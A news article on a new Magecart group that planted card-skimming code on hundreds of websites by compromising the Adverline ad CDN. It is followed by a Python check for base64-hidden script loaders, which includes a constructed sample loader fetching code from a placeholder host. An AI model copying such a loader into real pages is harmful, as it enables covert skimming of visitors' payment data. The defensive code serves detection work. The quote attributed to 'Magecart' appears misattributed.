New Magecart Group Hits Hundreds of Sites Via Supply Chain

Researchers have uncovered a twelfth Magecart group using tried-and-tested methods to disseminate digital skimming code by infecting the supply chain. RiskIQ, which has for several years been tracking the activity of groups using Magecart to steal customer card details, claimed the new group has managed to infect hundreds of websites so far via a third party.

That third party is Adverline, a French advertising agency. The attackers are said to have compromised a content delivery network for ads run by the company to include a stager containing the skimmer code. This means that any website loading a script from the ad agency's ad tag would inadvertently load the digital skimmer for visitors.

“Group 12 built out its infrastructure in September 2018; domains were registered, SSL certificates were set up through LetsEncrypt, and the skimming backend was installed. Group 12 doesn’t just inject the skimmer code by adding a script tag—the actors use a small snippet with a base64 encoded URL for the resource which is decoded at runtime and injected into the page,” explained Magecart in a blog post.
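The loader pattern in the quoted description can be checked for when reviewing third-party scripts. The following is an added example, not code from RiskIQ or from the original article: it scans JavaScript for string literals that base64-decode to a URL and raises confidence when the same script also decodes at runtime and creates a script element. The sample script, its placeholder host and the function names are constructed for illustration.

```python
import base64
import re

# Quoted string literals made only of base64 characters, long enough to hold a URL.
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{16,}={0,2})["']""")
SCRIPT_CREATE = re.compile(r'''createElement\(\s*["']script["']\s*\)''')
URL_PREFIXES = ("http://", "https://", "//")


def decode_url_literals(js_source):
    """Return (literal, decoded_url) for each string literal that base64-decodes to a URL."""
    hits = []
    for match in B64_LITERAL.finditer(js_source):
        literal = match.group(1)
        if len(literal) % 4:
            continue  # not a complete base64 string
        try:
            decoded = base64.b64decode(literal, validate=True).decode("ascii")
        except ValueError:  # covers bad base64 and non-ASCII output
            continue
        if decoded.startswith(URL_PREFIXES) and decoded.isprintable():
            hits.append((literal, decoded))
    return hits


def flag_hidden_script_loads(js_source, allowed_hosts=()):
    """Flag encoded URLs; high confidence if the script also calls atob and builds a script tag."""
    decodes = "atob(" in js_source
    injects = SCRIPT_CREATE.search(js_source) is not None
    findings = []
    for _literal, url in decode_url_literals(js_source):
        host = url.split("//", 1)[1].split("/", 1)[0].lower()
        if host in allowed_hosts:
            continue  # host is on the reviewer's allowlist
        findings.append({"url": url, "host": host, "high_confidence": decodes and injects})
    return findings


# Constructed samples; the hosts are placeholders, not indicators from the article.
ENCODED = base64.b64encode(b"https://cdn.example.invalid/lib/tag.js").decode()
SAMPLE_JS = (
    "(function(){var s=document.createElement('script');"
    "s.src=atob('" + ENCODED + "');document.head.appendChild(s);})();"
)
BENIGN_JS = "var s=document.createElement('script');s.src='https://static.example.org/a.js';"

if __name__ == "__main__":
    for finding in flag_hidden_script_loads(SAMPLE_JS):
        print(finding)
```

A plain-text search for unexpected hostnames misses this pattern because the URL only exists after decoding, which is why the check decodes candidate literals first.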
